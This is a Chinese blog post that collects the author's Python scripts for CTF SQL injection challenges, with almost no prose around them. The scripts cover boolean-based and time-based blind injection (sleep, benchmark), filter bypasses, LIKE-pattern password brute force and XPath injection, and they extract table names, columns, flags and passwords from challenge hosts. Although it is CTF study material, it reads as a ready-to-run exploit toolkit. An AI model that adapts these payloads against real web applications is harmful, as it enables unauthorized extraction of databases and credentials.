做过了这么多sql注入,把脚本整理一下
sql布尔盲注
#普通脚本
'''
import requests
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
database = ''
for x in xrange(1,20):
for i in dic:
url = "http://352fc37f-0497-4ec6-8b2a-c663a6d5e84e.node3.buuoj.cn/?stunum=1/**/&&/**/substr(database(),%d,1)='%c'--+" %(x,i)
try:
response = requests.get(url,timeout = 5)
if response.content.find('Hi admin, your score is: 100') != -1:
database = database + i
print database
break
except Exception,e:
pass
print database
import requests
host = 'http://c120d287-dc5a-47a2-9b10-84c734cbee35.chall.ctf.show/index.php?id='
def mid(bot, top):
return (int)(0.5 * (top + bot))
def sqli():
name = ''
for j in range(1, 250):
top = 126
bot = 32
while 1:
#babyselect = 'database()'---web1
#babyselect = '(select group_concat(table_name) from information_schema.tables where table_schema regexp database())'---flag,page,user
#babyselect = '(select group_concat(column_name) from information_schema.columns where table_name regexp 0x666c6167)'---FLAG_COLUMN,flag
babyselect = '(select flag from flag)'
select = "0 or ord(substr({} from {} for 1))>{}".format(babyselect, j, mid(bot, top))
r = requests.get(url=host + select.replace(' ', '/**/'))
#print(host + select.replace(' ', '/**/'))
if 'Child' in r.text:
if top - 1 == bot:
name += chr(top)
print(name)
break
bot = mid(bot, top)
else:
if top - 1 == bot:
name += chr(bot)
print(name)
break
top = mid(bot, top)
if __name__ == '__main__':
sqli()
'''
#[CISCN2019 华北赛区 Day2 Web1]Hack World
'''
import requests
import time
#url是随时更新的,具体的以做题时候的为准
url = 'http://7558e160-ede8-4f30-a7da-6b5727376b56.node3.buuoj.cn/index.php'
data = {"id":""}
flag = 'flag{'
i = 6
while True:
#从可打印字符开始
begin = 32
end = 126
tmp = (begin+end)//2
while begin<end:
print(begin,tmp,end)
time.sleep(1)
data["id"] = "if(ascii(substr((select flag from flag),{},1))>{},1,2)".format(i,tmp)
r = requests.post(url,data=data)
if 'Hello' in r.text:
begin = tmp+1
tmp = (begin+end)//2
else:
end = tmp
tmp = (begin+end)//2
flag+=chr(tmp)
print(flag)
i+=1
if flag[-1]=='}':
break
'''
# [CISCN2019 总决赛 Day2 Web1]Easyweb
'''
import requests
url = "http://9ab2997c-d180-475a-997b-cd035771b930.node3.buuoj.cn/image.php"
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#payload = " or id=if(ascii(substr((database()),%d,1))>%d,1,0)#" % (x, mid)
#payload = " or id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),%d,1))>%d,1,0)#" % (x, mid)
#users
#payload = " or id=if(ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),%d,1))>%d,1,0)#" % (x, mid)
#password
payload = " or id=if(ascii(substr((select password from users limit 0,1),%d,1))>%d,1,0)#" % (x, mid)
params = {
'id':'\\0',
'path':payload
}
response = requests.get(url, params=params)
if b'JFIF' in response.content:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
'''
#[极客大挑战 2019]FinalSQL
'''
#二分法要快很多
# -*- coding: UTF-8 -*-
import re
import requests
import string
url = "http://649d4d3a-b8a5-449d-82fa-aad24102ca6d.node3.buuoj.cn/search.php"
flag = ''
def payload(i,j):
# sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j) #数据库名字
# sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j) #表名
# sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j) #列名
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(i,j)
data = {"id":sql}
r = requests.get(url,params=data)
# print (r.url)
if "Click" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1,10000) :
print(i,':')
low = 31
high = 127
while low <= high :
mid = (low + high) // 2
res = payload(i,mid)
if res :
low = mid + 1
else :
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
exp()
print('flag=',flag)
'''
#[WUSTCTF2020]颜值成绩查询
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#颖奇L'Amore www.gem-love.com #转载请勿删除水印
import requests
from urllib.parse import *
res = ''
alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
for i in range(1,100):
for char in alphabet:
# information_schema,ctf
# payload = "select/**/group_concat(schema_name)/**/from/**/information_schema.schemata"
#flag,score
# payload = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
#flag,value,id,name,score
# payload = 'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()'
#wctf2020{e@sy_sq1_and_y0u_sc0re_1t}
payload = "select/**/group_concat(value)/**/from/**/flag"
payload = quote(payload)
url='http://101.200.53.102:10114/?stunum=2/(ascii(substr(({}),{},1))={})'.format(payload, i, ord(char))
r = requests.get(url)
# print(r.text[2473:2499])
if '666' in r.text:
res += char
print(res)
break
'''
#[NCTF2019]SQLi
'''
import time
import string
import requests
from urllib import parse
passwd = ''
string= string.ascii_lowercase + string.digits + '_'
url = 'http://fcffbbbf-04b1-48b1-b528-a4f6c010bb69.node3.buuoj.cn/'
for n in range(100):
for m in string:
time.sleep(0.1)
data = {
"username":"\\",
"passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((passwd+m),parse.unquote('%00'))
}
res = requests.post(url,data=data)
print(data['passwd']+'-'*int(10)+m)
if 'welcome' in res.text:
passwd += m
print(m)
break
if m=='_' and 'welcome' not in res.text:
break
print(passwd)
'''
#ctfshow web2_观星 _WEB_AK赛
'''
import requests
url="http://6d40c5f4-b306-43c2-b70d-342ca79ad9fd.chall.ctf.show/index.php?id=1^"
flag=""
for i in range(1,50):
print("i="+str(i))
for j in range(38,126):
#u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #库名 web1
#u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #表名 flag、page、user
#u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #列名 FLAG_COLUMN、flag
u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #flag字段
u=url+u
r=requests.get(u,timeout=100)
t=r.text
if("I asked nothing" in t):
flag+=chr(j)
print(flag)
break
'''
# 带上二分法
'''
import requests
host = 'http://c120d287-dc5a-47a2-9b10-84c734cbee35.chall.ctf.show/index.php?id='
def mid(bot, top):
return (int)(0.5 * (top + bot))
def sqli():
name = ''
for j in range(1, 250):
top = 126
bot = 32
while 1:
#babyselect = 'database()'---web1
#babyselect = '(select group_concat(table_name) from information_schema.tables where table_schema regexp database())'---flag,page,user
#babyselect = '(select group_concat(column_name) from information_schema.columns where table_name regexp 0x666c6167)'---FLAG_COLUMN,flag
babyselect = '(select flag from flag)'
select = "0 or ord(substr({} from {} for 1))>{}".format(babyselect, j, mid(bot, top))
r = requests.get(url=host + select.replace(' ', '/**/'))
#print(host + select.replace(' ', '/**/'))
if 'Child' in r.text:
if top - 1 == bot:
name += chr(top)
print(name)
break
bot = mid(bot, top)
else:
if top - 1 == bot:
name += chr(bot)
print(name)
break
top = mid(bot, top)
if __name__ == '__main__':
sqli()
'''
# ctfshow web1_签到_内部赛
'''
import requests
import re
url1 = "http://80aa5350-d5f9-478b-91e7-71cd1b0fec5b.chall.ctf.show/register.php"
url2 = "http://80aa5350-d5f9-478b-91e7-71cd1b0fec5b.chall.ctf.show/login.php"
flag=''
for i in range(1,50):
payload="hex(hex(substr((select/**/flag/**/from/**/flag)from/**/"+str(i)+"/**/for/**/1))),/*"
print(payload)
s=requests.session()
data1={
'e':str(i+30)+"',username="+payload,
'u':"*/#",
'p':i+30
}
#print(data1['e'])
r1 = s.post(url1,data=data1)
data2={
'e':i+30,
'p':i+30
}
r2=s.post(url2,data=data2)
t =r2.text
real = re.findall("Hello (.*?),",t)[0]
flag+=real
print(flag)
'''
# like 模糊测试脚本
'''
import requests
import string
strs = string.digits+string.ascii_letters
url = 'http://01a0d419-a06a-48de-b123-a27b8703807e.chall.ctf.show/login.php'
pwd = ''
for i in range(32):
print('i = '+str(i+1),end='\t')
for j in strs:
password = pwd + j + (31-i)*'_'
data = {'username':'yu22x','password':password}
r = requests.post(url,data=data)
if 'wrong' not in r.text:
pwd += j
print(pwd)
break
'''
#xpath
'''
import requests
from urllib.parse import *
res = ''
alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
for i in range(1,33):
for char in alphabet:
url='http://114.55.165.246:8082/?username=%27or%20substring((/root/users[position()=1]/user[position()=1]/password),'+str(i)+',1)=%27'+str(char)+'%27%20or%20%27%27=%27&password=&submit=%C3%A7%C2%99%C2%BB%C3%A5%C2%BD%C2%95'
r = requests.get(url)
if '登录成功you login as admin but username not admin' in r.text:
res += char
print(res)
break
'''
时间盲注
# coding:utf-8
import requests
import datetime
import time
# 获取长度
# def database_len():
# for i in range(1, 10):
# url = "http://challenge-658030cd43d1aad1.sandbox.ctfhub.com:10080/"
# payload = "?id=1 and if(length(database())>%d,sleep(3),0)" %i
# # print(url+payload+'%23')
# time1 = datetime.datetime.now()
# r = requests.get(url + payload + '%23')
# time2 = datetime.datetime.now()
# sec = (time2 - time1).seconds
# if sec >= 3:
# print(i)
# else:
# print("no")
# break
# print('database_len:', i)
#
#
# database_len()
#获取数据库名
# def database_name():
# name = ''
# for j in range(1, 9):
# for n in '0123456789abcdefghijklmnopqrstuvwxyz':
# url = "http://47.96.150.181:9004/"
# payload = "?username=0' or if(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),%d,1)='%s',sleep(5),1) or '1&password="% (j, n)
# # print(url+payload+'%23')
# time1 = datetime.datetime.now()
# r = requests.get(url + payload)
# time2 = datetime.datetime.now()
# sec = (time2 - time1).seconds
# if sec >= 5:
# name += n
# print(name)
# break
# print('database_name:', name)
#
#
# database_name()
#字典0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_:@#$%^{}
def table_name():
name = ''
for j in range(1,50):
for n in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-:@#$%^{}':
url = "http://47.96.150.181:9004/"
payload = "?username=0' or if(substr((select flag from flag limit 0,1),%d,1)='%s',sleep(3),1) or '1&password=" %(j,n)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 3:
name += n
print(name)
break
print('table_name:', name)
table_name()
#使用benchmark绕过盲注:
#coding:utf-8
import requests
import time
import datetime
url = "http://121.196.108.136"
result = ''
print('localhost-dvwa')
for i in range(0,100):
for char in range(1,127):
#设置payload
payload ="admin' and if((ascii(substr((select(group_concat(flag))from(flllllllaggggggg)),{},1)))={},benchmark(20000000,md5('aaa')),0)#".format(i,char)
data={'usname':payload,'pswd':'123'}
#计算响应时长
start = int(time.time())
r = requests.post(url,data=data)
#print url+payload
response_time = int(time.time()) - start
if response_time >= 2:
result += chr(char)
print('Found: {}'.format(result))
break
# 过滤单引号的时间盲注
import requests
import time as t
url = 'https://5bf6ae8e-105a-4a64-bb5c-80fc5fb8ff41.chall.ctf.show/index.php'
alphabet = ['a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
data = {
'username':'admin\\',
'password':''
}
result = ''
for i in range(20):
for char in alphabet:
payload = 'or/**/if((password/**/regexp/**/binary/**/"^{}"),sleep(4),1)#'.format(result+char)
data['password'] = payload
#time
start = int(t.time())
r = requests.post(url, data=data)
end = int(t.time()) - start
if end >= 3:
result += char
print(result)
break
# else:
# print(char)
# print(r.text)
# ctfshow web1_签到,过滤if,sleep的时间盲注
import requests
import time
i=1
n=2
flag=""
for i in range(42,44):
print(i)
m=64
j=64
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
data={"e":"cop\x40qq.com",
"u":exp,
"p":"123456"
}
url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
startTime=time.time()
p=requests.post(url,data=data,timeout=100)
#print(p.status_code)
print(m)
#print(exp)
#print(time.time()-startTime)
if time.time()-startTime<2:
n=1
else:
n=0
if q==7:
if time.time()-startTime<2:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)
浙公网安备 33010602011771号